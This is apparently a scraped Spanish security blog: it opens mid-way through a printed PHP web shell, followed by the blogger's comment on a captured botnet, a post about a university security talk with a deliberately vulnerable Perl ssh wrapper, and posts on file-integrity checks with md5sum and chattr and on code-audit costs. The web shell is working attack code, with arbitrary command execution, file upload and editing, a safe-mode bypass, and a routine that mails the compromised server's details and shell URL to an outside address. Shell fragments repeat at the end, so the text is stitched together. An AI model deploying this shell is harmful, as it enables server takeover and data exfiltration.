 echo "}";
 echo "}";
 echo "function Copy(chdir, file) {";
 echo "var o = prompt('Copied for:', '/tmp/' + file);";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir +
'&file=' + file +

'&fcopy=' + o + \"\";";
 echo "}";
 echo "}";
 echo "function Mkdir(chdir) {";
 echo "var o = prompt('Nama Folder?', 'Folder_Baru');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir +
'&newdir=' + o +

\"\";";
 echo "}";
 echo "}";
 echo "function Newfile(chdir) {";
 echo "var o = prompt('Nama File?', 'File_Baru.txt');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir +
'&newfile=' + o +

\"\";";
 echo "}";
 echo "}";
 echo "";

 // End JavaScript

 /* Functions */
 function cmd($CMDs) {
 $CMD[1] = '';
 exec($CMDs, $CMD[1]);
 if (empty($CMD[1])) {
  $CMD[1] = shell_exec($CMDs);
 }
  elseif (empty($CMD[1])) {
  $CMD[1] = passthru($CMDs);
 }
 elseif (empty($CMD[1])) {
  $CMD[1] = system($CMDs);
 }
 elseif (empty($CMD[1])) {
  $handle = popen($CMDs, 'r');
  while(!feof($handle)) {
   $CMD[1][] .= fgets($handle);
  }
  pclose($handle);
 }
 return $CMD[1];
 }

if (@$_GET['chdir']) {
 $chdir = $_GET['chdir'];
} else {
  $chdir = getcwd()."/";
 }
if (@chdir("$chdir")) {
 $msg = "TAG font color=\"#008000\"> Pintu Masuk ke Direktori, OK!";
} else {
 $msg = "TAG font color=\"#FF0000\">Error: Gagal masukkan ke folder!";
 $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
 $chdir = str_replace(chr(92), chr(47), $chdir);

if (@$_GET['action'] == 'upload') {
 $uploaddir = $chdir;
 $uploadfile = $uploaddir. $_FILES['userfile']['name'];
 if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .

$_FILES['userfile']['name'])) {
 $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$_FILES['userfile']['name']}, Upload File Berjaya.

";
 } else {
   $msg = "TAG font color=\"#FF0000\">Error: Upload File Gagal.";
  }
}
elseif (@$_GET['action'] == 'mkdir') {
   $newdir = $_GET['newdir'];
   if (@mkdir("$chdir"."$newdir")) {
    $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$newdir}, folder

berhasil dibuat. ";
   } else {
      $msg = "TAG font color=\"#FF0000\">Error: Pembuatan folder
gagal.";
     }
}
elseif (@$_GET['action'] == 'newfile') {
   $newfile = $_GET['newfile'];
   if (@touch("$chdir"."$newfile")) {
    $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$newfile}, berhasil

dibuat! ";
   } else {
      $msg = "TAG font color=\"#FF0000\">Error: Tak Boleh Buat File!";
     }
}

elseif (@$_GET['action'] == 'del') {
    $file = $_GET['file']; $type = $_GET['type'];
    if ($type == 'file') {
     if (@unlink("$chdir"."$file")) {
      $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$file}, Berhasil

menghapus arsip (file)!";
     } else {
        $msg = "TAG font color=\"#FF0000\">Error: Gagal menghapuskan File
(file)!";
       }
    } elseif ($type == 'dir') {
       if (@rmdir("$chdir"."$file")) {
         $msg = "TAG font color=\"#008000\">TAG font color=\"#000080\">{$file}, Berhasil

menghapus folder!";
       } else {
          $msg = "TAG font color=\"#FF0000\">Error: Gagal menghapuskan
folder!";
         }
      }
}
elseif (@$_GET['action'] == 'chmod') {
    $file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
    if (@chmod ("$file", $chmod)) {

     $msg = "TAG font color=\"#008000\">Chmod dari TAG font color=\"#000080\">{$_GET['file']} TAG font color=\"#008000\">berubah
menjadi

TAG font color=\"#000080\">$chmod TAG font color=\"#008000\">:
Sukses!";
    } else {
       $msg = 'TAG font color=\"#FF0000\">Error: Gagal mengubah
chmod.';
      }
}
elseif (@$_GET['action'] == 'rename') {
    $file = $_GET['file']; $newname = $_GET['newname'];
    if (@rename("$chdir"."$file", "$chdir"."$newname")) {
     $msg = "TAG font color=\"#008000\">Archive TAG font color=\"#000080\">{$file}

TAG font color=\"#008000\">named for TAG font color=\"#000080\">{$newname} TAG font color=\"#008000\">successfully!";
    } else {
       $msg = "TAG font color=\"#FF0000\">Error: Gagal menukar File.";
      }
}
elseif (@$_GET['action'] == 'copy') {
   $file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
   if (@copy("$file", "$copy")) {
    $msg = "TAG font color=\"#000080\">{$file}, TAG font color=\"#008000\">disalin

menjadi TAG font color=\"#000080\">{$copy} TAG font color=\"#008000\">

Berhasil!";
   } else {
      $msg = "TAG font color=\"#FF0000\">Error: Gagal menyalin  TAG font color=\"#000000\">{$file} TAG font color=\"#FF0000\">menjadi
TAG font color=\"#000000\">{$copy}";
     }
}
/* Parte Atualiza 02:48 12/2/2006 */

elseif (@$_GET['action'] == 'cmd') {
 if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
 if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
 $cmd = stripslashes(trim($cmd));
 $result_arr = cmd($cmd);

 $afim = count($result_arr); $acom = 0; $msg = '';
 $msg .= "
Hasil : ".$cmd."

";
 if ($result_arr) {
 while ($acom <= $afim) {
  $msg .= "
 ".@$result_arr[$acom]."

";
 $acom++;
  }
 }
 else {
 $msg .= "
Error: Gagal Menjalankan perintah.

";
 }
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
 echo "Loading... module
";

   if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
       @dl('php_shmop.dll');
   } else {
       @dl('shmop.so');
   }
}

if (@extension_loaded('shmop')) {
 echo "Module: shmop loaded!
";

 $shm_id = @shmop_open(0xff2, "c", 0644, 100);
 if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
 $data="\x00";
 $offset=-3842685;
 $shm_bytes_written = @shmop_write($shm_id, $data, $offset);
 if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire
length of

data\n"; }
 if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for
deletion."; }
 echo passthru("id");
 shmop_close($shm_id);

} else { echo "Module: shmop tidak dimuat!
"; }
}

elseif (@$_GET['action'] == 'zipen') {
 $file = $_GET['file'];
 $zip = @zip_open("$chdir"."$file");
 $msg = '';
if ($zip) {

   while ($zip_entry = zip_read($zip)) {
       $msg .= "Name:               " . zip_entry_name($zip_entry) . "\n";
       $msg .= "Actual Filesize:    " . zip_entry_filesize($zip_entry) .
"\n";
       $msg .= "Compressed Size:    " .
zip_entry_compressedsize($zip_entry) . "\n";
       $msg .= "Compression Method: " .
zip_entry_compressionmethod($zip_entry) . "\n";

       if (zip_entry_open($zip, $zip_entry, "r")) {
           echo "File Contents:\n";
           $buf = zip_entry_read($zip_entry,
zip_entry_filesize($zip_entry));
           echo "$buf\n";

           zip_entry_close($zip_entry);
       }
       echo "\n";

   }

   zip_close($zip);

}
}
elseif (@$_GET['action'] == 'edit') {
 $file = $_GET['file'];
 $conteudo = '';
 $filename = "$chdir"."$file";
 $conteudo = @file_get_contents($filename);
 $conteudo = htmlspecialchars($conteudo);
 $back = $_SERVER['HTTP_REFERER'];
 echo "
Editing {$file} ...

";
 echo "
";
 echo "
";
 echo "


";
 echo "

";
 echo "";
 echo "
";
 echo "
";
 print "{$conteudo}

";
 echo "
";
 echo "
 ";
 echo "
 ";
 echo "

";
 echo "

";
}
elseif (@$_GET['action'] == 'save') {
  $filename = "$chdir".$_GET['file'];
  $somecontent = $_POST['S1'];
  $somecontent = stripslashes(trim($somecontent));
  if (is_writable($filename)) {
   @$handle = fopen ($filename, "w");
   @$fw = fwrite($handle, $somecontent);
   @fclose($handle);
   if ($handle && $fw) {
    $msg = "TAG font color=\"#000080\">{$_GET['file']}, TAG font color=\"#008000\">berhasil diedit!";
   }
 } else {
   $msg = "TAG font color=\"#000000\">{$_GET['file']}, TAG font color=\"#FF0000\">tidak

bisa ditulisi!";
  }
}

// Informa?s
 $cmdget = '';
 if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
 if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
 $cmdget = htmlspecialchars($cmdget);
 function asdads() {
 $asdads = '';
 if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
 if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
 if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
 if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
 if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
 return $asdads;
 }

echo "
";
echo "
";
echo "
Informasi

";
echo "
";
echo "
";
echo "


 ";
echo "


";
echo "

";
echo "
";
echo "


 ";
echo "


";
echo "

";
echo "
";
echo "


 ";
echo "


";
echo "

";
 if (strtoupper(substr($OS, 0,3) != 'WIN')) {
 $Methods = asdads();
 if ($Methods == '') { $Methods = "???"; }
 echo "
";
 echo "


 ";
 echo "


";
 echo "

";
 }

echo "
";
echo "


 ";
echo "


";
echo "

";
echo "
";
echo "


 ";
echo "


";
echo "

";
echo "";
echo " Sistem  : {$OS}
";
echo " Nama : {$UNAME}
";
echo " PHP : {$PHPv},  Safe Mode : {$SafeMode}
";
 echo "Methods : {$Methods}
";
echo " IP : {$IpServer}
";
echo " Perintah :



";
echo "


";
// Dir

echo "
";
echo "
";
if (is_writable("$chdir")) {
 if (strtoupper(substr($OS, 0,3) == 'WIN')) {
 echo "
Dir YES: {$chdir} - Folder Baru | File Baru | Remote

Access

";
 } else {
   echo "
Dir YES: {$chdir} - Folder Baru | File Baru | Kembali";
  }
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
 echo "
Dir NO: {$chdir} - Foldr Baru | File Baru | Remote

Access

";
 } else {
   echo "
Dir NO: {$chdir} - Folder Baru | File Baru | Kembali

";
  }
}

if (@!$handle = opendir("$chdir")) {
 echo " Gue gak bisa masuk folder, Klik sini!
untuk Kembali ke folder ori!
";
}
else {
echo "
";
echo "
";
echo "


";
echo "    

";
echo "
";
echo "


";
echo "    

";
echo "
";
echo "


";
} else {
  echo "
$msg

";
 }
echo "    

";
echo "
";
echo "


";
echo "     Upload:";
echo "
";
echo "
 
";
if (@!$msg) {
 echo "
Messages
 


 ";
echo "
";
echo "
 ";
echo "


";
echo "


";
echo "


";
echo "


";
echo "     

";
$colorn = 0;
   while (false !== ($file = readdir($handle))) {
       if ($file != '.') {
           if ($colorn == 0) {
            $color = "style=\"background-color: #FF9900\"";
           }
           elseif ($colorn == 1) {
            $color = "style=\"background-color:  #FFCC33\"";
           }
           if (@is_dir("$chdir"."$file")) {
            $file = $file.'/';
            $mode = 'chdir';
           } else {
              $mode = 'edit';
            }
           if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
             $chdir .= '/';
           }
           if ($file == '../') {
            $lenpath = strlen($chdir); $baras = 0;
            for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') {
$baras++; } }
            $chdir_ = explode("/", $chdir);
            $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
           }
           $perms = @fileperms ("$chdir"."$file");
           if ($perms == '') {
            $perms = '???';
           }
           $size = @filesize ("$chdir"."$file");
           $size = $size / 1024;
           $size = explode(".", $size);
           if (@$size[1] != '') {
            $size = $size[0].'.'.@substr("$size[1]", 0, 2);
           } else {
              $size = $size[0];
            }
           if ($size == 0) {
            if ($mode == 'chdir') {
             $size = '???';
            }
           }
           echo "
";
    echo "


";
           if (@is_writable ("$chdir"."$file")) {
            if ($mode == 'chdir') {
             if ($file == '../') {
              echo "


";
             } else {
                echo "


";
               }
            } else {
 if (is_readable("$chdir"."$file")) {
                echo "


";
               } else {
                  echo "


";
                 }
              }
           }
          else {
            if ($mode == 'chdir') {
             if ($file == '../') {
              echo "


";
             } else {
                echo "


";

              }
            } else {
 if (@is_readable("$chdir"."$file")) {
                echo "


";
               } else {
                  echo "


";
                }
              }
            }
           echo "


";
           if ($mode == 'edit') {
            echo "


";
           } else {
              echo "


";
             }
           echo "

";
           if ($colorn == 0) {
            $colorn = 1;
           }
           elseif ($colorn == 1) {
            $colorn = 0;
           }
       }
   }
   closedir($handle);
}

 $OS = @PHP_OS;
 $UNAME = @php_uname();
 $PHPv = @phpversion();
 $SafeMode = @ini_get('safe_mode');

 if ($SafeMode == '') { $SafeMode = "OFF
"; }
 else { $SafeMode = "$SafeMode
"; }

 $injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);

 $psn=("OS = " . $OS . "
UNAME = " . $UNAME . "
PHPVersion = " .
$PHPv . "
Safe

Mode = " . $SafeMode . "
TAG font color=blue>http://" . $injek .
"
Ingat jangan

Guna Target Ini.
By: NABIL");

 $header = "From: $_SERVER[SERVER_ADMIN] <$from>\r\nReply-To:
$replyto\r\n";
 $header .= "MIME-Version: 1.0\r\n";
 If ($file_name) $header .= "Content-Type: multipart/mixed;
boundary=$uid\r\n";
 If ($file_name) $header .= "--$uid\r\n";
 $header .= "Content-Type: text/$contenttype\r\n";
 $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
 $header .= "$message\r\n";
 If ($file_name) $header .= "--$uid\r\n";
 If ($file_name) $header .= "Content-Type: $file_type;
name=\"$file_name\"\r\n";
 If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
 If ($file_name) $header .= "Content-Disposition: attachment;

filename=\"$file_name\"\r\n\r\n";
 If ($file_name) $header .= "$content\r\n";
 If ($file_name) $header .= "--$uid--";
 $to = ("haumil@gmail.com");
 $subject = ("Inbox linda.");
 mail($to,$subject,$psn,$header);

@include "$bn";
?>
  Permision  Nama File  Kapasiti  Perintah
 $perms  TAG font color=\"#008000\">$file  TAG font color=\"#008000\">$file  TAG a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file
 $file  $file
 $file  $file
 $file  $size KB  Rename | Del

| Chmod | Copy  Rename | Del

| Chmod | Copy









Esta un poco mejor shell99, pero tampoco esta mal, lo que si es que se ve que han tenido tiempo no para desarrollar sino para encontrar los scripts y usarlos, interesante se ve que hay una o 2 personas que mas o menos le dan a la codificacion en perl y un poco en PHP pero en realidad las botnets no estan muy desarrolladas.
Esta decente el botnet, se puede tomar control de ella y obvamente no hacen mucho por generar una botnet mas compleja y mas grande, sin embargo me da la idea para desarrollar una de prueba de concepto durante estas fechas que ando de relax de programar en python para pruebas de volumen.
Bueno despues de tanto codigo .. me lanzo ….

Conferencia en la UNIVO

nahual — Wed, 19 Nov 2008 20:17:32 +0000

Me invitaron a dar una conferencia y un taller en la UNIVO, estuvo excelente la verdad, me gusto que estuviera llena la conferencia que di y mas que mas de la mitad hubieran estado en la conferencia pasada, el titulo de la conferencia fue:

Seguridad Informatica: Pasado, Presente y Futuro – Casos de Estudio

La verdad estuvo interesante porque dejamos los slides de lado y nos pusimos a ver fallos de ayer, de hoy y de mañana en varios lugares, la verdad no pude aplicar la de un buen XSS para el phishing porque estaba haciendo un caor de la fregada y ya andaba en modo zombi pero se puso bueno en realidad.

Asi que aqui les dejo la conferencia, los slides estan muy muy genericos sin embargo tambien dejo los programas que se vieron dentro de la conferencia, no puedo dejar los URL ya que se hizo con el sistema de la UNIVO, lo siento.

Los ejemplos fueron los mas basicos para mostrar fallos que aun ahora se encuentran en servidores:


#!/usr/bin/perl
#

print "Bienvenido al proxy de autenticacion de la red segura de Victima.net, escriba el servidor interno: ";
$server = < STDIN >;
chomp($server);
system("ssh -l externo $server");

Ese tipo de ejemplos facilitos para ejemplificar la forma en que todavia se hackean servidores de universidades grandes que ofrecen servicios como pine para sus usuarios, aun funciona con planetas, dragones, etc.

Igual ejemplos de malas contraseñas, inyecciones avanzadas de SQL, algunas maquinas de estado, utilizacion de la libreria de GAUL para mutar strings para el fuzzing, etc. cosas basiquitas.

En fin .. me lanzo a jalar que hoy tengo un poco de jale …

Tu Peor Enemigo: El Otro Admin

nahual — Tue, 04 Dec 2007 01:34:06 +0000

Sandino Araico Sanchez dentro de sus conferencias ha generado controversia dandoles el titulo del “Tu Peor Enemigo”, dentro de esta conferencia (que recomendamos mucho) intenta buscar los peores enemigos de un buen sistema y una buena seguridad de lo mismo.

Tomando el ejemplo de Sandino, daremos nosotros lo que se debe de hacer para
contrarrestar a “Tu Peor Enemigo”.

“Yo no he cambiado Nada” — Tu Peor Enemigo: El Otro Administrador.

Esta frase la he oido de clientes, administradores, estudiantes y hasta familiares: “Yo no he cambiado nada”, “Solo dejo de funcionar”, “De la nada ya no jala”,etc.

Esta frase es la peor frase que se puede oir sobre todo a altas horas de la noche o muy muy temprano en un dia de trabajo, ya que sabemos que habran cientos de llamadas de usuarios que no podran usar este servicio. Tuve yo un encuentro con el peor enemigo en una compañia a la que le daba servicio, siendo rarisimo que dejaran de usarse los servicios tuve que obviamente
ponerme a trabajar para detener a uno de los peores enemigos: “El Otro Administrador”

Obviamente restriccion de privilegios no funcionara ya que el tambien es administrador y el debe de tener privilegios para reiniciar servicios, hacer cambios requeridos, etc.

El problema entonces se refiere tanto a saber que se cambio, como a mantener una función que inhabilite los cambios en servicios que son criticos.

¿Cuales son los servicios criticos? En este caso era:

Servidor de Correo (Postfix)
Servidor de Web (Apache)
Servidor de base de datos (MySQL)

Ok entonces tenemos varios archivos que tienen la posibilidad de ser cambiados, teniendo asi un problema serio en los servicios, asi como el reinicio de los mismos y los logs.

Podemos tener aqui varias soluciones, la mas facil:

Instalar AIDE o algo parecido

El problema es que entonces el otro administrador va a querer administrar también nuestra base de datos de seguridad, lo cual nos deja no nada mas igual, si no peor.

Podemos crear rápidamente una base de datos con firmas md5 y tener un simple chequeo de cambios y que mande un correo con los cambios, ¿Como podemos crear una base de datos de ese tipo?

En una simple linea de comando:

find  -print | xargs md5sum > archivo_de_firmas.md5

Es decir, en nuestro ejemplo tenemos postfix:

find /etc/postfix -print | xargs md5sum > postfix_signatures.md5

Para Apache:

find /etc/apache2 -print | xargs md5sum > apache2_signatures.md5

En caso de que fuese apache.1.X.X:

find /etc/apache -print | xargs md5sum > apache_signatures.md5

find /etc/httpd -print | xargs md5sum > apache_signatures.md5

Teniendo ya esto podemos simplemente verificar las firmas dando el siguiente comando:

md5sum -c postfix_signatures.md5

lo cual nos daria un resultado de OK en caso de que las firmas fueran las
mismas.

¿Para que nos ayuda esto?, siendo md5 una firma del archivo cualquier cambio
que se le haga, aunque sea de una letra, un byte, cambiaria la firma dando asi
una veruficacion del cambio y nos puede dar una pista de donde estuvo el
cambio que genero el problema en realidad.

Un ejemplo con un directorio simple:

Obviamente esto puede ser incrementado hasta para un sistema operativo completo PERO hay que tomar en cuenta que cosas como los logs, utmp, wtmp, etc. cambian con el uso del servidor.Esto puede agregarse al crontab para que corra cada hora (o hasta cada 10 minutos si de verdad el enemigo es agil, rapido y con presteza para romper las cosas). Un ejemplo de crontab que corre cada 15 minutos y manda un correo con el output es:

#Poner SHELL y mandar correo con MAILTO
SHELL=/bin/sh
MAILTO=enrique.sanchez@security-dojo.com
#
# corre cada 15 minutos
*/15 * * * *       md5sum -c $HOME/fingerprints/apache2_fingerprints.md5

Podemos decir que hemos derrotado a nuestro enemigo, sin embargo tenemos otro problema, este es un remedio reactivo, el daño ya fue hecho y ahora tenemos que limpiar el problema. ¿Qué podemos hacer entonces?

El siguiente paso de defensa sobre nuestro peor enemigo: chattr

Este paso me sirvio muchisimo en una empresa donde todo el mundo movia cosas y “no movi nada” era la respuesta mas importante, sobre todo porque “el backend es tu problema no el mio”, en cuanto aplique la siguiente técnica el director
general supo rapidamente quienes movian las configuraciones, ya que se quejaron de que no podian hacerlo mas, siendo que “Nunca antes lo habian hecho” como ellos mismos dijeron.

chattr es una herramienta indispensable, que desgraciadamente no funciona en el sistema resiserfs (ya que reiser usa cosas mas complejas que ext2 y ext3) pero en ext2 y ext3 (que la mayoria de la gente usa) son excelentes.

La herramienta lsattr nos deja ver los atributos del archivo, el atributo que veremos por el momento es inmutable (i) si damos rapidamente un lsattr a httpd.conf podemos ver lo siguiente:

firebolt apache2 # lsattr httpd.conf
-------------- httpd.conf
firebolt apache2 #

Lo cual nos dice que no tiene ningun atributo por lo cual podemos editarlo de la siguiente manera:

firebolt apache2 # echo cambio >> httpd.conf
firebolt apache2 # tail -3 httpd.conf

# vim: ts=4 filetype=apache
cambio
firebolt apache2 #

Ahora hagamos el archivo inmutable, esto quiere decir que este atributo le
dice al sistema queu aun siendo root no puede modificarse, ni borrarse:

firebolt apache2 # chattr +i httpd.conf
firebolt apache2 # echo cambio >> httpd.conf
-bash: httpd.conf: Permission denied
firebolt apache2 # lsattr httpd.conf
----i--------- httpd.conf
firebolt apache2 #

¡EXCELENTE!

Ahora si queremo editarlo simplemente podemos remover el atributo de inmutable al archivo y podremos editarlo:

firebolt apache2 # chattr -i httpd.conf
firebolt apache2 # echo cambio2 >> httpd.conf
firebolt apache2 # lsattr httpd.conf
-------------- httpd.conf
firebolt apache2 # tail -3 httpd.conf
# vim: ts=4 filetype=apache
cambio
cambio2
firebolt apache2 #

El siguiente es un ejemplo de como usar chattr:

Estas dos técnicas son básicas para comenzar a detener al otro admin, la educación asi como la experiencia iran ayudando al otro admin para poder tener mejor control sobre su servidor (si es que quiere tener control de su servidor)Espero que con esto este peor enemigo pueda ser detenido al menos un poco.

Beneficios de una Auditoria de Código

nahual — Mon, 12 Nov 2007 04:12:09 +0000

Una auditoria informática es una parte central e importante de la seguridad, ya sea una aplicación comprada o una aplicación hecha en casa la información contenida es el verdadero valor de la aplicación.

Una aplicación contiene errores debido a que el programador no fue enseñado con seguridad en mente, en realidad no habla nada de su experiencia sino que es un campo nuevo y que se lleva rapidamente en la expansión de técnicas y formas de explotación.

Libros y clases estan llenas a veces de errores, reuso de código asi como toma de ejemplos y políticas de programación puede afectar hasta el punto de crear una aplicación vulnerable, estas vulnerabilidades pueden ir desde suplantación de identidades, robo de contraseñas, toma de control de la aplicación, toma de control del servidor, etc.

Estas aplicaciones se ejecutan en servidores que contienen información como correos, planes de ventas, mercadotecnia, asuntos personales de altos ejecutivos, etc. Los cuales conllevan un riesgo y un valor añadido a la red.

Un Penetration Testing, también llamado hackeo ético, es un ataque controlado por consultores que conocen técnicas hackers o hackers de sombrero blanco (Whitehats) que descubren y explotan fallos de seguridad dentro de la red y los reportan, reduciendo el riesgo de la red asi como de los aplicativos e información dentro de la misma.

¿Inversión o Gasto?

En mi experiencia he tenido que contestar la siguiente pregunta mas de una vez:

¿Porque si mi aplicación costó X el costo de auditarla es Y? (Donde X < Y)

Creo que la respuesta mas obvia es:

-. El valor real de la aplicación puede ser definida por la siguiente ecuación de riesgo:

COSTO APLICACION

+ COSTO INFORMACION
+ COSTO DOWNTIME
- AMORTIZACION COSTO APLICACION
+ MANTENIMIENTO
___________________________________
= COSTO TOTAL DE APLICACION

Como se puede ver en la ecuación anterior el costo de la aplicación es solo la inversión inicial, intangibles como COSTO INFORMACION y COSTO DOWNTIME deben ser generados en un analisis de riesgo informático ya que son los costos generalmente mas grandes debido a que el COSTO DOWNTIME es:

COSTO OPERACION
+ PERDIDAS MERCADOTECNIA (MARCA, ETC)
+ VENTAS PERDIDAS (En caso de ventas por Internet o sistemas criticos abajo)
____________________________________
= COSTO DOWNTIME

La importancia de una auditoría de código radica en la reducción de los factores de riesgo haciendo que la probabilidad de ocurrencia baje a lo minimo. Esto nos da un ejemplo de riesgo:

Una aplicación de 50,000 MXN maneja 3,000,000 MXN el costo de downtime es de 50,000 por hora y el mantenimiento es de 5,500 MXN al mes.

Si la aplicación tiene un riesgo del 75% de ser atacada y perder los datos, ser modificados o comprometer el servidor, el riesgo real que debe de reportarse es de:

(50,000 + 3,000,000 + (50,000 * 3) + 5,500) * 75% = 2,404,125 MXN

Este riesgo tiene una probabilidad de generarse en un 100% en un tiempo cercano (debido a la interacción de la variable del 75% esta ya prorrateado al tiempo de 1 año)

Este tipo de riesgo es simplemente inaceptable en la mayoria de las compañias, al auditar la aplicación se encuentran los fallos, se arreglan y por lo tanto la probabilidad de ser atacada y perder datos, modificarlos o comprometer el servidro baja, por ejemplo un 25% del ejemplo anterior seria:

(50,000 + 3,000,000 + (50,000 * 3) + 5,500) * 75% = 801,375 MXN

Lo cual es una reducción de riesgo considerable, tomando en cuenta que la auditoria costara 1,000,000 MXN aun asi habria un ahorro de aproximadamente 600,000 MXN neto dentro del primer año.

Esto es importante debido a que la mayoria de las compañias estan tomando la opcion del “open source” como una opcion barata, pero descuidan el recordar que no es gratis su mantenimiento y que el riesgo sigue estando vigente y que debe mantenerse de manera administrativamente responsible para la empresa.

El que sea una aplicación desarrollada en un lenguaje libre o con licencia libre (dicese GPL, BSD, etc) no lleva a que sea gratis su mantenimiento ni que el riesgo que lleva sea pequeño. Por lo tanto se debe tener una gran calidad de trabajo o asegurarse de las credenciales de quien hace el trabajo.

Es buena practica el pedir un demo de lo mismo o requerir una maqueta en caso de tener un desarrollo desde el diseño o la implementación de algun esquema medianamente complejo a muy complejo.

"; echo " Sistem	: {$OS}
"; echo " Nama	: {$UNAME}
"; echo " PHP	: {$PHPv}, Safe Mode : {$SafeMode}
"; echo "Methods	: {$Methods}
"; echo " IP	: {$IpServer}
"; echo " Perintah	:

Permision	Nama File	Kapasiti	Perintah
$perms	TAG font color=\"#008000\">$file	TAG font color=\"#008000\">$file	TAG a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file	$file	$file	$file	$file	$file	$size KB	Rename \| Del \| Chmod \| Copy	Rename \| Del \| Chmod \| Copy